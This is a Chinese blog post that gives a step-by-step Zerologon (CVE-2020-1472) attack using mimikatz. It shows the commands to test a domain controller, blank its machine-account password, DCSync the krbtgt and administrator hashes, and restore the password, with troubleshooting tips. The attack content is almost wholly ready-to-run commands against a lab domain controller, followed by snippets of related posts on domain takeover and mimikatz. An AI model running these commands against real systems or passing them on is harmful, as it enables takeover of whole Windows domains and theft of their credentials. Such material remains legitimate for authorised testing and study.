看我拿下域控之利用mimikatz打cve2020-1472

最新推荐文章于 2024-05-12 13:02:42 发布
最新推荐文章于 2024-05-12 13:02:42 发布
阅读量1.1k 收藏 1
点赞数
文章标签: 安全漏洞 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43227251/article/details/115652542
版权

利用mimikatz利用cve2020-1472

原理在上一节说了,本章不多提,主要介绍mimikatz利用方式

检测目标机是否存在cve2020-1472

 lsadump::zerologon  /target:域控IP  /account:域控主机名$
lsadump::zerologon  /target:192.168.18.20 /account:WIN-H06K3JJM9AO$

在这里插入图片描述

清空域控密码

lsadump::zerologon  /target:域控IP  /account:域控主机名$  /exploit
lsadump::zerologon /target:192.168.18.20 /account:WIN-H06K3JJM9AO$ /exploit

在这里插入图片描述

获取目标机的HASH

 lsadump::dcsync /domain:de1ay.com /dc:dc.de1ay.com /user:krbtgt /authuser:dc$ /authdomain:de1ay.com /authpassword:"" /authntlm
注意:本地测试需要将DNS指向域控

lsadump::dcsync /domain:abc.com /dc:DC.abc.com /user:administrator /authuser:WIN-H06K3JJM9AO$ /authdomain:abc.com /authpassword:"" /authntlm

Bp9SXQ.md.png

恢复密码

lsadump::postzerologon /target:dc.de1ay.com /account:dc$
lsadump::postzerologon /target:192.168.18.20 /account:WIN-H06K3JJM9AO$

BpMxIK.md.png

注:mimikatz在读取域内HASH的时候需要配置DNS 指向域控 /dc: win08.test.com 这里填写域控的完整的名字 ; 输入参数都正确的情况还获取不了, 重启AD服务 在恢复密码的时候注意先去运行privilege::debug

qin9.
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
内网渗透,横向移动总结(mimikatz域控
墨痕诉清风的博客
08-23 2943
前言 通常我们在渗透过程中从外围打点进入内网后拿到主机提升到system权限,这一台主机就已经拿下。但是我们进入内网的目标还是拿下尽可能多的主机,这时候选择横向移动的方法就尤为重要。今天就对一些常用的横向手法进行一个总结,有不足之处欢迎师傅们进行斧正。 本次实验均在本地搭建靶场进行,靶场拓扑图如下: 利用windows远程连接命令 ipc连接 IPC$(Internet Process Connection) 是为了让进程之间通信的一种“管道”,通过提供用户名密码建立了一条安全的、加密的
CVE-2020-1472复现
sinat_36853972的博客
09-21 1169
CVE-2020-1472复现 简介 Netlogon使用的AES认证算法中的vi向量默认为0,导致攻击者可以绕过认证,同时其设置域控密码的远程接口也使用了该函数,导致可以将域控中保存在AD中的管理员password设置为空 复现环境 DC: os:windows 2012 server ip:192.168.106.137 攻击机: os:kali ip:192.168.106.129 影响版本 Windows Server 2008 R2 for x64-based Systems Service P
2024年网络安全最全内网渗透神器(Mimikatz)——使用教程,2024年最新当上项目经理才知道
最新发布
2401_84267585的博客
05-12 2049
Mimikatz是法国人benjamin开发的一款功能强大的轻量级调试工具,本意是用来个人测试,但由于其功能强大,能够直接读取WindowsXP-2012等操作系统的明文密码而闻名于渗透测试,可以说是渗透必备工具。当目标为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,但可以通过修改注册表的方式抓取明文。
mimikatz hash传递--获取域控权限
qq_46635165的博客
10-18 1922
mimikatz hash传递–获取域控权限 实验环境 实验环境:win_server2012 ip:192.168.3.132 (域内普通用户,有本地管理员权限,但不知明文密码) win_server2008 ip:192.168.3.133 (DC域控,与server2012管理员密码相同,但不知明文密码) 此时,你已经拿下了域内一普通用户win_server2012 实验步骤 1,将mimikatz上传至win_server2012; 2,cd 至mimikatz目录; 3,使用reg命令,将注册表
mimikatz实战域渗透抓取域控管理员密码
子曰小玖的博客
04-30 1218
实验环境: 攻击机:Kali 靶 机:Windows server 2012 工具:mimikatz2.1 这里实验所需要的工具我会上传到我的资源里面,有需要的小伙伴可以自己去下载 条件:靶机获取到shell之后必须是管理员的权限 步骤: **我这里攻击利用的msf里面的regsvr32_applocker_bypass_server模块 利用的是注册表漏洞** ps:其实这个也...
CVE-2020-1472漏洞实战 深度剖析
Ms08067安全实验室
11-18 9209
本文作者:Faith(Ms08067实验室 内网安全攻防知识星球)0x00漏洞说明CVE-2020-1472是继MS17010之后一个比较好用的内网提权漏洞,影响Windows Serv...
域控服务器排查命令,mimikatz利用zerologon攻击域控服务器相关命令(附蓝队自查方案)...
weixin_32019361的博客
08-02 662
0x01 前言mimikatz 20200918版本支持通过zerologon漏洞攻击域控服务器。下载链接如下https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20200918-fix官方利用截图如下 mimikatz相关命令lsadump::zerologon /target:dc.hacke.testlab /account:d...
mimikatz-2.2.0-20220919.zip
01-06
这个压缩包“mimikatz-2.2.0-20220919.zip”包含了最新版本的mimikatz程序,发布日期为2022年9月19日。 1. **mimikatz核心功能** - **密码提取**:mimikatz可以提取Windows系统的内存中明文密码,包括SAM数据库、...
mimikatz-master源码
07-22
mimikatz-master
mimikatz_trunk-1_mimikatz_
10-03
标题中的"mimikatz_trunk-1_mimikatz_"很可能是指mimikatz的一个版本或者分支,"trunk"通常是开发过程中的主分支,而数字"1"可能是版本号的一部分。这个压缩包可能包含了该版本的源代码、文档和不同平台的可执行文件...
Invoke-Mimikatz.ps1
01-06
Invoke-Mimikatz.ps1
mimikatz 2.2.0 20210810-2 自己编译版
08-01
x64 位,解决官方版本在 win server 2016 域控环境下 无法 sid::patch 的问题。
CVE-2020-1472 Netlogon特权提升漏洞分析及复现
include_voidmain的博客
03-03 7111
0x01漏洞背景 NetLogon远程协议是一种在Windows 域控上使用的RPC 接口,被用于各种与用户和机器认证相关的任务。最常用于让用户使用NTLM协议登录服务器,也用于NTP响应认证以及更新计算机域密码。 微软MSRC于8月11日发布了Netlogon 特权提升漏洞安全通告。此漏洞CVE编号CVE-2020-1472,CVSS评分:10.0。由Secura公司的Tom Tervoort发现提交并命名为ZeroLogon。 0x02漏洞分析 Netlogon协议使用的是自定义的加密协议来让客户端(加
CVE-2020-1472复现过程(不需要输入DC Name)
weixin_39811856的博客
02-10 306
环境搭建 Windows server 2012R2 IP:192.168.146.183 漏洞利用 使用mimikatz进行检测 使用mimikatz进行密码置空 在大部分网上所给出的脚本中,发现DC Name需要手动输入,根据系统命令的调用,发现通过系统命令可得到局域网内主机的DC Name Windows: Linux: 检测脚本(仅检测,不具有破坏性)可调用系统命令得到局域网内DC Name: 在使用检测脚本时,要求impacket库版本为0.9...
域控安全之域渗透
m0_59598029的博客
02-25 617
在通常情况下、即使拥有管理员权限,也无法读取域控制器中的C:\Windwos\NTDS\ntds.dit文件(活动目录始终访问这个文件,所以文件被禁止读取)。使用Windows本地卷影拷贝服务可以获得文件的副本。在活动目录中,所有的数据都保存在ntds.dit文件中。ntds.dit是一个二进制文件,存储位置为域控制器的。ntds.dit中包含(但不限于)用户名、散列值、组、GPP、OU等与活动目录相关的信息。它和SAM文件一样,是被Windows操作系统锁定的。
CVE-2020-1472 域内提权
网络安全。
09-16 6159
0x1 工具 这里使用zerologon_tester(https://github.com/SecuraBV/CVE-2020-1472)工具验证漏洞是否存在,使用zerologon(https://github.com/risksense/zerologon)工具复现。 运行set_empty_pw.py脚本需要最新版的impacket(https://github.com/SecureAuthCorp/impacket/commit/64ce46580286b5ab15a4737bddf85201ce
内网渗透神器(Mimikatz)——使用教程
热门推荐
W小哥
04-16 6万+
一、工具简介 Mimikatz是法国人benjamin开发的一款功能强大的轻量级调试工具,本意是用来个人测试,但由于其功能强大,能够直接读取WindowsXP-2012等操作系统的明文密码而闻名于渗透测试,可以说是渗透必备工具。 二、Mimikatz命令 cls: 清屏 standard: 标准模块,基本命令 crypto: 加密相关模块 sekurlsa: 与证书相关的模块 kerberos: kerberos模块 privilege: 提权相关模块 process: 进程相关
获取域控的方法
2301_76786857的博客
01-19 1373
在域渗透中、作为渗透测试人员,获取域控的权限基本上可以获取整个内网的权限
授权渗透实践:利用MS14-68漏洞操控内网域控
作者注意到域控未打上KB3011780补丁,因此利用Mimikatz工具(一个强大的Windows安全工具集)和MS14-068漏洞exploit来获取域控的系统信息,包括清除内存中的Kerberos票据。 接下来,作者通过执行`whoami/all`命令...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值